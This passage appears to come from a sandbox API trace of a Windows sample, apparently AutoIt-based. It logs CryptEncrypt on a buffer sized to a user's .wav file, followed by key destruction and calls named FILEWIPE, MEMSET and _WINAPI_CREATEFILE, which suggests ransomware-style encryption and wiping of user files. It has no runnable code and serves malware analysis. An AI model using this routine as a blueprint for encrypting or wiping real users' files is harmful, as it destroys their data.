pdwDataLen=0x6ae220*=0x160d0) returned 1 [0038.801] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.801] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.801] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.801] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.801] CharLowerBuffW (in: lpsz="byte[90321]", cchLength=0xb | out: lpsz="byte[90321]") returned 0xb [0038.801] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.804] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.806] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9611b8*, pdwDataLen=0x6ae220*=0x160cd, dwBufLen=0x160d0 | out: pbData=0x9611b8*, pdwDataLen=0x6ae220*=0x160d0) returned 1 [0038.806] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.806] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.806] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.809] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.809] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.809] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.809] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.809] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.809] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.809] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.809] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.809] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.809] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.810] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.810] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.810] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.810] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.818] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.818] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.818] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.823] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.823] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.823] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.823] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.823] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.824] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0038.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.824] CryptDestroyKey (hKey=0x7c2280) returned 1 [0038.824] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.824] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.824] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0038.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.824] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.824] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.824] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.824] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.825] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0038.825] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.825] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.825] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.825] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.825] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.825] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.825] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.825] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.825] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.825] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0038.826] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0038.826] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.826] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0038.826] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.826] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0038.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.826] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.826] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0038.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.826] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.827] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.827] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.828] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.828] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0038.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.828] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5605b140, ftCreationTime.dwHighDateTime=0x1d5bb02, ftLastAccessTime.dwLowDateTime=0x44983720, ftLastAccessTime.dwHighDateTime=0x1d5c084, ftLastWriteTime.dwLowDateTime=0x44983720, ftLastWriteTime.dwHighDateTime=0x1d5c084, nFileSizeHigh=0x0, nFileSizeLow=0x160cd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="E6Du.wav", cAlternateFileName="")) returned 0x7c2100 [0038.828] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.828] CharLowerBuffW (in: lpsz="byte[90317]", cchLength=0xb | out: lpsz="byte[90317]") returned 0xb [0038.829] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.829] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.829] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.829] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.829] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.829] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.830] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.830] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.830] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.830] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0038.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, 